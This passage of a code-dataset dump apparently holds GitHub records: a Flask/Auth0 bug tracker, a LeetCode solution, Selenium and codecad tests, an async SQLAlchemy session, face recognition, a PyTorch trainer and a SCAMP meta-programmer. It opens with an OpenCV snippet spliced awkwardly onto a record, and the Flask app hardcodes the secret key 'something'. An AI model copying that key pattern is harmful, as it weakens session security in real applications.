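cv2.rectangle(canvas, (40, 40), (160, 160), (255, 255, 255), -1)   # a filled white square to outline

gray = cv2.cvtColor(canvas, cv2.COLOR_BGR2GRAY)
_, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(canvas, contours, -1, (0, 0, 255), 2)             # outline in red (BGR)
print(len(contours), "contour(s) found")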
Item = Body(embed=True)):\r\n results = {\"item_id\": item_id, \"item\": item}\r\n return results","repo_name":"EneruJ/H3PyDocker","sub_path":"APIDocker/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18451048557","text":"import sys,os\nfrom os import environ as env\nfrom flask import Flask, redirect, jsonify,session,url_for,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom authlib.integrations.flask_client import OAuth\nfrom six.moves.urllib.parse import urlencode\n\nfrom info import *\n\napp = Flask(__name__)\napp.secret_key = \"something\"\n# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\napp.config['SQLALCHEMY_DATABASE_URI'] = env.get('DATABASE_URL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\noauth = OAuth(app)\n\nAUTH0_BASE_URL='https://'+ env.get('AUTH0_DOMAIN')\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH, POST, DELETE, OPTIONS')\n return response\n\nauth0 = oauth.register(\n 'auth0',\n client_id = env.get('AUTH0_CLIENT_ID'),\n client_secret = env.get('AUTH0_CLIENT_SECRET'),\n api_base_url = AUTH0_BASE_URL,\n access_token_url =AUTH0_BASE_URL + '/oauth/token',\n authorize_url = AUTH0_BASE_URL + '/authorize',\n client_kwargs={\n 'scope': 'openid profile email',\n },\n)\n\nfrom models.Ticket import Ticket\nfrom models.Users import Users\nfrom models.Map_users_proj import Map_users_proj\nfrom models.Project import Project\nfrom models.Ticket_history import Ticket_history\nfrom models.Notification import Notification\nfrom models.Comment import Comment\nfrom models.MonthConfig import MonthConfig\n\nfrom controllers import userController, developer,ticket,comment,project,Admin,manager,notification\n\n@app.route('/')\ndef login():\n return auth0.authorize_redirect(redirect_uri=env.get('AUTH0_CALLBACK_URL'), audience=env.get('AUTH0_AUDIENCE'))\n\n@app.route('/callback')\ndef callback_handling():\n auth0.authorize_access_token()\n resp = auth0.get('userinfo')\n userinfo = resp.json()\n users = Users.query.filter_by(users_email=userinfo['email']).first()\n users = users.format()\n session['userProfile'] = {\n 'email': userinfo['email'],\n 'role': users['role'],\n 'name':userinfo['nickname'],\n 'id':users['id']\n }\n if(users['role'] == \"admin\"):\n return redirect('/'+ users['role']+ '/users')\n if users['role'] == \"manager\":\n return redirect('/'+ users['role']+ '/dashboard')\n return redirect('/'+ users['role']+ '/tickets')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n params = {'returnTo': url_for('login', _external=True), 'client_id': env.get('AUTH0_CLIENT_ID')}\n return redirect(auth0.api_base_url + '/v2/logout?' 
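# --- Illustrative sketch (not part of the FastAPI record above) ---
# Body(embed=True) makes FastAPI expect the payload nested under the parameter
# name, i.e. {"item": {...}} rather than a bare object. Minimal self-contained demo;
# the route mirrors the record but the model fields here are trimmed for brevity.
from fastapi import Body, FastAPI
from fastapi.testclient import TestClient
from pydantic import BaseModel

demo = FastAPI()

class Item(BaseModel):
    name: str
    price: float

@demo.put("/items/{item_id}")
def update_item(item_id: int, item: Item = Body(embed=True)):
    return {"item_id": item_id, "item": item}

client = TestClient(demo)
ok = client.put("/items/42", json={"item": {"name": "hammer", "price": 9.99}})
flat = client.put("/items/42", json={"name": "hammer", "price": 9.99})
assert ok.status_code == 200
assert flat.status_code == 422        # un-nested body is rejected when embed=True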
+ urlencode(params))\n\n\n@app.errorhandler(404)\ndef error_404(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '404',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(422)\ndef error_404(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '422',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(500)\ndef error_500(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '500',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(401)\ndef error_401(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '401',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(403)\ndef error_403(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '403',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"rohangandhi109/bugTracker","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14692230769","text":"class Solution(object):\n def numTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n \n ref = [0 for _ in range(n+1)]\n ref[0] = ref[1] = 1\n \n if n < 2: return 1\n \n for i in range(2, n+1):\n for j in range(1, i+1):\n ref[i] += ref[j-1]*ref[i-j]\n \n return ref[n]","repo_name":"mavelyc/leetcode-practice","sub_path":"python/unique-BST.py","file_name":"unique-BST.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9254592060","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom utils.core_test_case import CoreTestCase\n\n\nclass TestProductSticker(CoreTestCase):\n def test_product_sticker(self, driver):\n driver.get(\"http://localhost/litecart/en/\")\n WebDriverWait(driver, 10).until(EC.title_is(\"Online Store | My Store\"))\n\n products = driver.find_elements(By.CSS_SELECTOR, \".content .box .product\")\n\n for product in products:\n stickers = product.find_elements(By.CLASS_NAME, \"sticker\")\n if len(stickers) == 0:\n print(f\"Product {product.find_element(By.CLASS_NAME, 'name').text} doesn't have a sticker.\")\n elif len(stickers) > 1:\n print(f\"Product {product.find_element(By.CLASS_NAME, 'name').text} has {len(stickers)} 
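# --- Illustrative sketch (not part of the numTrees record above) ---
# The same DP counts Catalan numbers, so it can be cross-checked against the
# closed form C(2n, n) / (n + 1). Pure standard-library code.
from math import comb

def num_trees(n):
    dp = [1] + [0] * n                     # dp[0] = 1: the empty tree
    for i in range(1, n + 1):
        for root in range(1, i + 1):       # pick each value as the root
            dp[i] += dp[root - 1] * dp[i - root]
    return dp[n]

for n in range(1, 10):
    assert num_trees(n) == comb(2 * n, n) // (n + 1)
print(num_trees(3), num_trees(4))          # 5 14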
stickers!\")\n","repo_name":"miowch/Selenium_Course","sub_path":"tests/test_product_sticker.py","file_name":"test_product_sticker.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20952420207","text":"# # Native # #\nimport asyncio\nfrom typing import AsyncGenerator\n\n# # Installed # #\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.asyncio import async_scoped_session\n# from sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlmodel.ext.asyncio.session import AsyncSession\n\n# # Package # #\nfrom core.database.database import async_engine\n\n__all__ = (\n \"get_session\"\n)\n\n\nasync_session_factory = sessionmaker(\n bind=async_engine,\n expire_on_commit=False,\n class_=AsyncSession,\n autocommit=False,\n autoflush=False\n)\n\n# passing a lambda function to async_scoped_session that returns the ID of the current asyncio task as the session scope.\n# This ensures that each session is associated with a unique task and gets its own connection.\nasync_session_factory = async_scoped_session(\n async_session_factory, scopefunc=lambda: id(asyncio.current_task()))\n\n\nasync def get_session() -> AsyncGenerator[AsyncSession, None]:\n async with async_session_factory() as session:\n try:\n yield session\n await session.commit()\n except Exception:\n await session.rollback()\n raise\n finally:\n await session.close()\n\n\n# async def get_session_with_bind() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autocommit() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine, autocommit=True) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autoflush() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine, autoflush=True) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autocommit_and_autoflush() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine, autocommit=True, autoflush=True) as session:\n# yield session\n","repo_name":"ruslands/auth-service","sub_path":"core/database/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"27053385941","text":"import numpy as np \nimport cv2 as cv\n\npeople = ['Ben Afflek','Elton John','Jerry Seinfield','Madonna','Mindy Kaling']\nhaar_cascade = cv.CascadeClassifier('face_detection/haarcascade_frontalface_default.xml')\n\n# features = np.load('features.npy')\n# labels = np.load('labels.npy')\n\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\nface_recognizer.read('face_trained.yml')\n\nimg = cv.imread(r'C:\\Users\\omkar\\Desktop\\opencv\\Resources\\Faces\\val\\mindy_kaling\\2.jpg')\ndef test_on(img):\n gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n\n #Detect:\n faces_rect = haar_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=4)\n for (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h,x:x+w] # REGION OF INTEREST\n #Prediction:\n label,confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {label} with a confidence of {confidence}')\n\n cv.putText(img, str(people[label]),(20,20),cv.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\n cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\n\n cv.imshow('Detected 
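# --- Illustrative usage sketch (not part of the session module record above) ---
# An async-generator dependency like get_session is typically wired into FastAPI
# with Depends, which drives its commit/rollback/close branches per request.
# The import path, route and query below are assumptions for the demo.
from fastapi import Depends, FastAPI
from sqlalchemy import text
from sqlmodel.ext.asyncio.session import AsyncSession

from core.database.session import get_session   # hypothetical import path

app = FastAPI()

@app.get("/health")
async def health(session: AsyncSession = Depends(get_session)):
    # any exception raised here triggers the generator's rollback branch
    result = await session.execute(text("SELECT 1"))
    return {"db": result.scalar_one()}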
Face',img)\n\ntest_on(img)\ncv.waitKey(0)\n\n\n#NOT THAT GOOD A FACE RECOGNITION :(","repo_name":"OmkarGhadge/FaceRecognition","sub_path":"face_recognition/face_rec.py","file_name":"face_rec.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71292850839","text":"import itertools\nimport math\n\nimport pytest\n\nimport codecad\nimport codecad.subdivision\n\n\ndef set_has_approx_item(s1, i2, *args, **kwargs):\n for i1 in s1:\n if i1 == pytest.approx(i2, *args, **kwargs):\n return True\n\n return False\n\n\nclass SetApproxEquals:\n def __init__(self, s1, s2, *args, **kwargs):\n self.s1_extra = set()\n for item1 in s1:\n if not set_has_approx_item(s2, item1, *args, **kwargs):\n self.s1_extra.add(item1)\n\n self.s2_extra = set()\n for item2 in s2:\n if not set_has_approx_item(s1, item2, *args, **kwargs):\n self.s2_extra.add(item2)\n\n def __bool__(self):\n return len(self.s1_extra) == len(self.s2_extra) == 0\n\n def __str__(self):\n return \" \".join(\n [\n \"Extra values in s1:\",\n str(self.s1_extra),\n \"Extra values in s2:\",\n str(self.s2_extra),\n ]\n )\n\n\n@pytest.mark.parametrize(\n \"box_size\", [codecad.util.Vector(10, 20, 30), codecad.util.Vector(16, 16, 16)]\n)\n@pytest.mark.parametrize(\"dimension\", [2, 3])\n@pytest.mark.parametrize(\"resolution\", [1, 0.1])\n@pytest.mark.parametrize(\n \"grid_size, multiplier\", [(2, 1), (2, 2), (21, 1), (256, 1), (256, 256)]\n)\n@pytest.mark.parametrize(\"overlap\", [True, False])\ndef test_block_sizes(box_size, dimension, resolution, grid_size, overlap, multiplier):\n box = codecad.util.BoundingBox(-box_size / 2, box_size / 2)\n bs = codecad.subdivision.calculate_block_sizes(\n box, dimension, resolution, grid_size, overlap, multiplier\n )\n\n assert bs[-1][0] == 1, \"Final block size must have block size 1\"\n for i, (level_resolution, level_size) in enumerate(bs):\n if i > 0:\n for j in range(dimension):\n assert (\n level_size[j] == grid_size\n ), \"Non-top level blocks must have the preset grid resolution\"\n if dimension == 2:\n assert level_size[2] == 1, \"2D blocks must have just a single layer in Z\"\n assert (\n level_size[0] > 1 or level_size[1] > 1 or level_size[2] > 1\n ), \"All levels must have more than one sub-blocks\"\n\n for j in range(dimension):\n assert (\n level_size[j] % multiplier == 0\n ), \"All level sizes must be divisible by muliplier\"\n\n real_block_size = bs[0][0] * resolution\n if overlap and len(bs) == 1:\n for i in range(dimension):\n assert (\n bs[0][1][i] >= box_size[i] / real_block_size + 1\n ), \"Top level block must cover the whole box (overlap)\"\n assert multiplier > 1 or box_size[i] / real_block_size + 1 > (\n bs[0][1][i] - 1\n ), \"Top level block must not be too large (overlap)\"\n else:\n for i in range(dimension):\n assert bs[0][1][i] >= box_size[i] / (\n bs[0][0] * resolution\n ), \"Top level block must cover the whole box\"\n assert multiplier > 1 or box_size[i] / real_block_size > (\n bs[0][1][i] - 1\n ), \"Top level block must not be too large\"\n\n for (\n level_number,\n ((level_resolution, level_size), (prev_level_resolution, prev_level_size)),\n ) in enumerate(zip(bs[:-1], bs[1:])):\n for i in range(dimension):\n if overlap and level_number == len(bs) - 2:\n assert level_resolution == prev_level_resolution * (\n prev_level_size[i] - 1\n ), \"Each level must exactly cover the next one (overlap)\"\n else:\n assert (\n level_resolution == prev_level_resolution * prev_level_size[i]\n ), 
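# --- Illustrative sketch (not part of the face-recognition record above) ---
# Roughly how a face_trained.yml like the one that record loads could be produced.
# Directory layout, label order and file names are assumptions; requires opencv-contrib.
import os
import cv2 as cv
import numpy as np

people = ['Ben Afflek', 'Elton John', 'Jerry Seinfield', 'Madonna', 'Mindy Kaling']
haar = cv.CascadeClassifier('face_detection/haarcascade_frontalface_default.xml')

features, labels = [], []
for label, person in enumerate(people):
    folder = os.path.join('Resources', 'Faces', 'train', person)   # assumed layout
    for file_name in os.listdir(folder):
        img = cv.imread(os.path.join(folder, file_name))
        if img is None:
            continue
        gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
        for (x, y, w, h) in haar.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=4):
            features.append(gray[y:y+h, x:x+w])
            labels.append(label)

recognizer = cv.face.LBPHFaceRecognizer_create()
recognizer.train(features, np.array(labels))
recognizer.save('face_trained.yml')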
\"Each level must exactly cover the next one\"\n\n\ndef test_block_corners_cube():\n _, _, blocks = codecad.subdivision.subdivision(\n codecad.shapes.box(10), 1, grid_size=4, overlap_edge_samples=True\n )\n\n assert blocks[0][2] == 1\n assert blocks[0][4] == 1\n\n corners = {block[1] for block in blocks}\n expected = {\n codecad.util.Vector(*coords)\n for coords in itertools.product([-5.5, -2.5, 0.5, 3.5], repeat=3)\n } - {\n codecad.util.Vector(*coords)\n for coords in itertools.product([-2.5, 0.5], repeat=3)\n }\n\n assert corners == expected\n\n\ndef test_block_corners_circle():\n resolution = 0.1 # Size of single cell\n grid_size = 8\n step = resolution * (grid_size - 1) # Size of the inner block\n diameter = grid_size * step - resolution\n radius = diameter / 2\n threshold = math.sqrt(2) * step / 2\n\n _, _, blocks = codecad.subdivision.subdivision(\n codecad.shapes.circle(diameter),\n resolution,\n grid_size=grid_size,\n overlap_edge_samples=True,\n )\n\n assert blocks[0][2] == resolution\n assert blocks[0][4] == 1\n\n r = []\n for i in range(grid_size):\n r.append(-radius - 0.5 * resolution + i * step)\n\n corners = {block[1] for block in blocks}\n\n expected = set()\n for coords in itertools.product(r, repeat=2):\n corner = codecad.util.Vector(*coords)\n center = corner + codecad.util.Vector(step / 2, step / 2, 0)\n if radius - threshold < abs(center) < radius + threshold:\n expected.add(corner)\n\n assert SetApproxEquals(corners, expected)\n","repo_name":"bluecube/codecad","sub_path":"tests/test_subdivision.py","file_name":"test_subdivision.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"29747768120","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import Compose\n\nfrom model.AudioTransformer import AudioTransformer\nfrom model.UnlabeledDataset import UnlabeledDataset\nfrom model.UnsupervisedTrainer import UnsupervisedTrainer\nfrom runners.shared import setup_args\nfrom transforms.Flattener import Flattener, UndoFlattener\nfrom transforms.PatchMasker import PatchMasker\nfrom transforms.Sequencer import Sequencer, UndoSequencer\n\n\ndef train_model():\n args = setup_args().parse_args()\n dataset = UnlabeledDataset(\n csv_file=args.csv_file,\n root_dir=args.data_folder,\n extension=args.extension\n )\n data_loader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True)\n\n flattener_memory = []\n transform = Compose([\n PatchMasker(\n patch_width=args.patch_width,\n patch_height=args.patch_height,\n probability=args.patch_probability\n ),\n Flattener(memory=flattener_memory),\n Sequencer(sequence_length=args.sequence_length),\n ])\n\n undo_transform = Compose([\n UndoSequencer(),\n UndoFlattener(memory=flattener_memory, original_shape=(args.input_height, args.input_width))\n ])\n\n model = AudioTransformer(\n input_width=args.input_width,\n input_height=args.input_height,\n hidden_size=args.hidden_size,\n num_layers=args.num_layers,\n num_heads=args.num_heads,\n pre_transforms=transform,\n post_transforms=undo_transform,\n kernel_size=args.kernel_size,\n stride=args.stride,\n dropout_rate=args.dropout_rate\n )\n\n # optimizer = torch.optim.AdamW(params=model.parameters(), lr=hp.learning_rate)\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.learning_rate)\n loss_fn = torch.nn.MSELoss()\n scheduler = torch.optim.lr_scheduler.StepLR(\n optimizer=optimizer,\n step_size=args.scheduler_step_size,\n 
gamma=args.scheduler_gamma)\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(device)\n trainer = UnsupervisedTrainer(model=model, optimizer=optimizer, loss_fn=loss_fn, scheduler=scheduler, device=device)\n\n trainer.train(\n data_loader=data_loader,\n epochs=args.epochs,\n save_interval=args.save_interval\n )\n\n\nif __name__ == '__main__':\n train_model()\n","repo_name":"calin2110/Recommendor","sub_path":"recommendor/runners/TransformerTrainer.py","file_name":"TransformerTrainer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13572835781","text":"import os\nimport unittest\n\n# from flake8.engine import get_style_guide\n# flake8.api.legacy.get_style_guide(**kwargs)\n# http://flake8.pycqa.org/en/latest/user/python-api.html\n\n# import flake8.api.legacy\n# def get_style_guide(*args, **kwargs):\n# return flake8.api.legacy.get_style_guide(*args, **kwargs)\n\nfrom flake8.api import legacy as flake8\n\n# disbale the flake8 logger:\n# http://flake8.pycqa.org/en/latest/user/python-api.html\nfrom logging import getLogger\n\ngetLogger('flake8').propagate = False\n\nstyle_guide = flake8.get_style_guide(\n ignore=(\n # 'E129', # visually indented line with same indent (in gui.py)\n 'E501', # line too long\n # 'E126', # continuation line over-indented for hanging indent\n # 'E128', # continuation line under-indented for visual indent\n # 'E221', # multiple spaces before operator\n # 'E222', # multiple spaces after operator\n # 'E722', # do not use bare except\n # 'F403', # 'import *' used; unable to detect undefined names\n # 'F405', # ... may be undefined, or defined from star imports: ...\n ),\n report=None,\n exclude=[]\n)\n\n\ndef base_directory():\n current = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(current, '..')\n\n\nclass Flake8Test(unittest.TestCase):\n\n def test_flake8(self):\n report = style_guide.check_files([\n base_directory()\n ])\n\n self.assertEqual(report.get_statistics('E'), [], 'Flake8 reports errors')\n","repo_name":"Blokkendoos/AACircuit","sub_path":"tests/test_flake.py","file_name":"test_flake.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"85"} +{"seq_id":"11594523602","text":"from math import log2\nfrom collections import Counter\n\nclass MetaInstruction:\n def __init__(self, source, target):\n self.source = source\n self.target = target\n\n\nclass MoveMetaIntstruction(MetaInstruction):\n def __init__(self, source, target, scale, shift, neg=False):\n super().__init__(source, target)\n self.scale = scale\n self.shift = shift\n self.neg = neg\n\n def length(self):\n return abs(self.scale) + abs(self.shift[0]) + abs(self.shift[1]) + self.neg\n\n def cost(self):\n return self.length()\n\n def __str__(self):\n dirs = []\n if self.shift[0] < 0:\n dirs.append(('\\u2192', abs(self.shift[0]))) # right\n if self.shift[0] > 0:\n dirs.append(('\\u2190', abs(self.shift[0]))) # left\n if self.shift[1] < 0:\n dirs.append(('\\u2191', abs(self.shift[1]))) # up\n if self.shift[1] > 0:\n dirs.append(('\\u2193', abs(self.shift[1]))) # down\n if self.scale > 0:\n dirs.append(('+', abs(self.scale)))\n if self.scale < 0:\n dirs.append(('-', abs(self.scale)))\n\n s = ('m [%d]->[%d] || ' % (self.source, self.target)) + ' '.join(['%s (%d)' % (s, a) for s, a in dirs])\n if self.neg:\n s = s + ' ¬'\n return s\n\n def __repr__(self):\n return 
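# --- Illustrative sketch (not part of the trainer record above) ---
# The usual ordering of optimizer.step() and StepLR.step() inside an epoch loop:
# the scheduler advances once per epoch, after the optimizer update, so the
# learning rate decays by `gamma` every `step_size` epochs. Model and data are stand-ins.
import torch

model = torch.nn.Linear(8, 1)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=2, gamma=0.5)
loss_fn = torch.nn.MSELoss()

x, y = torch.randn(32, 8), torch.randn(32, 1)
for epoch in range(6):
    optimizer.zero_grad()
    loss = loss_fn(model(x), y)
    loss.backward()
    optimizer.step()
    scheduler.step()                       # lr halves every 2 epochs
    print(epoch, scheduler.get_last_lr())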
self.__str__()\n\n\nclass AddMetaInstruction(MetaInstruction):\n def __init__(self, source1, source2, s1neg, s2neg, target):\n super().__init__(source1, target)\n self.source2 = source2\n self.s1neg = s1neg\n self.s2neg = s2neg\n\n def cost(self):\n return 1\n\n def __str__(self):\n if self.s1neg:\n a, b, op = self.source2, self.source, '-'\n elif self.s2neg:\n a, b, op = self.source, self.source2, '-'\n else:\n a, b, op = self.source, self.source2, '+'\n\n return '+ [%d]%s[%d]->[%d]' % (a, op, b, self.target)\n\n def __repr__(self):\n return self.__str__()\n\n\ndef get_shift(pair):\n \"\"\"Return the distance from goal 1 to goal 2, -1 if the goals are not similar\"\"\"\n down, up = pair\n ratio = len(down)/len(up)\n scale = int(log2(ratio))\n # identify the distinct values\n down, up = Counter([a.val() for a in down]), Counter([a.val() for a in up])\n\n if len(up) != len(down):\n raise ValueError('[Error] Invalid pair. No shift possible: ' + str(pair))\n\n lower_pivot = next(iter(down.keys()))\n lower_pivot_count = down[lower_pivot]\n lower_pivot_x, lower_pivot_y, lower_pivot_neg = lower_pivot\n for (upper_pivot_x, upper_pivot_y, upper_pivot_neg), upper_pivot_count in up.items():\n if upper_pivot_count * ratio != lower_pivot_count:\n continue\n distance_x, distance_y, distance_neg = \\\n upper_pivot_x-lower_pivot_x, upper_pivot_y-lower_pivot_y, upper_pivot_neg != lower_pivot_neg\n # For the distance of the selected pivots, we must find a mapping for all remaining atoms\n # if not, the pivot selection was wrong and we select another pivot (break)\n for lower_x, lower_y, lower_neg in down.keys():\n if (lower_x+distance_x, lower_y+distance_y, lower_neg != distance_neg) not in up.keys():\n break\n else:\n return scale, (distance_x, distance_y), distance_neg\n raise ValueError('[Error] Invalid pair. No shift possible: ' + str(pair))\n\n\ndef find_goal_in_reg(reg_state, needle_goal):\n for reg, goal in reg_state.items():\n if goal == needle_goal:\n return reg\n return -1\n\n\ndef generate_meta_program(plan):\n meta_program = []\n\n prev_reg_state = {\n 0: plan[0].pair[0] # assign initial state\n }\n\n next_reg = 1\n\n for step in plan:\n\n trivial = set()\n new_reg_state = {}\n\n non_trivial_goals = []\n # consider all trivial goals\n for i, goal in enumerate(step.goals):\n # if the goal is a goal we had before, just leave it in same register, nothing else to be done\n prev_reg = find_goal_in_reg(prev_reg_state, goal)\n if prev_reg >= 0:\n new_reg_state[prev_reg] = goal\n trivial.add(prev_reg)\n else:\n non_trivial_goals.append(goal)\n if len(non_trivial_goals) == 0:\n continue\n if len(non_trivial_goals) > 2:\n print('[ERROR] Wrong number of non-trivial goals per step')\n return\n\n # analyze non trivial goals\n # A non trivial goal is either:\n # - sum of two previous goals plus a shift of a previous goal\n # - sum of one previous goals plus a shift of a previous goal\n # - shift of a previous goal.\n # - sum of two previous goals\n # There can be only one non-trivial goal with a shift, and only one without shift\n # We have to perform the non-trivial goal without shift first\n\n shift_gen_set = step.pair[1]\n shift_source = find_goal_in_reg(prev_reg_state, step.pair[0])\n if shift_source == -1:\n print('[ERROR] Could not construct new register state from previous register state. (No shift gen)')\n\n\n goal_props = []\n for goal in non_trivial_goals:\n # grab all the previous goals that are subsets of this goal (max. 
2)\n subset_sources = set()\n shift_portion = goal\n for reg, prev_goal in prev_reg_state.items():\n if prev_goal.issubset(goal):\n subset_sources.add(reg)\n shift_portion = shift_portion.difference(prev_goal)\n if shift_portion and shift_portion != shift_gen_set and shift_portion | step.pair[0] != shift_gen_set:\n print('[ERROR] Could not construct new register state from previous state (shift gen do not match)')\n goal_props.append((False if not shift_portion else True, subset_sources, goal))\n\n # separate the shift goal from the non-shift goal\n goal_props.sort(key=lambda x: x[0])\n\n # if we have a non-shift non-trivial goal, apply that first\n if len(goal_props) > 1: # we have both, non shift and shift\n _, non_shift_subset_sources, goal = goal_props[0]\n s1, s2 = tuple(non_shift_subset_sources)\n # find a target\n t = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(s1, s2, False, False, t))\n new_reg_state[t] = goal\n\n # the second part is now the shift non-trivial goal\n _, shift_subset_sources, shift_goal = goal_props[-1]\n scale, shift, polarity = get_shift(step.pair)\n # if we have a zero distance shift, we have to remove the shift source from the subset sources, as this\n # is no longer a subset source, but results from the scaling (move)\n if not polarity and shift[0] == 0 and shift[1] == 0 and shift_source in shift_subset_sources:\n shift_subset_sources.remove(shift_source)\n\n # if we have two subset sources, it uses less registers to add them together first. Otherwise, do shift first\n if len(shift_subset_sources) < 2 or shift_subset_sources.issubset(trivial):\n target = next_reg\n next_reg += 1\n # if we do not do any adds later on, we have to do a potential inversion in the move step\n meta_program.append(MoveMetaIntstruction(shift_source, target, scale, shift, (len(shift_subset_sources) == 0) and polarity))\n prev_polarity = polarity\n\n for subset_source in shift_subset_sources:\n prev_target = target\n target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(subset_source, prev_target, False, prev_polarity, target))\n prev_polarity = False\n\n else:\n s1, s2 = tuple(shift_subset_sources)\n sub_target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(s1, s2, False, False, sub_target))\n shift_target = next_reg\n next_reg += 1\n meta_program.append(MoveMetaIntstruction(shift_source, shift_target, scale, shift))\n target = next_reg\n next_reg += 1\n meta_program.append(AddMetaInstruction(sub_target, shift_target, False, polarity, target))\n\n new_reg_state[target] = shift_goal\n prev_reg_state = new_reg_state\n\n return meta_program","repo_name":"ThomasDebrunner/auto_code_cpa","sub_path":"scamp_filter/MetaProgrammer.py","file_name":"MetaProgrammer.py","file_ext":"py","file_size_in_byte":8460,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"33469046777","text":"# import data loading libraries\nimport os\nimport pdb\nimport pickle\nimport argparse\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# import torch\nimport torch\n\n# numpy & scipy imports\nimport numpy as np\nimport imageio\nimport matplotlib.pyplot as plt \nimport cv2 \n\ndef checkpoint(checkpoint_dir, epoch, G_XtoY, G_YtoX, Dp_X, Dp_Y, Dg_X, Dg_Y, best=False):\n \"\"\"Saves the parameters of both generators G_YtoX, G_XtoY and discriminators D_X, D_Y.\"\"\"\n if best == True:\n checkpoint_dir = os.path.join(checkpoint_dir, 'best')\n else:\n checkpoint_dir = os.path.join(checkpoint_dir, 
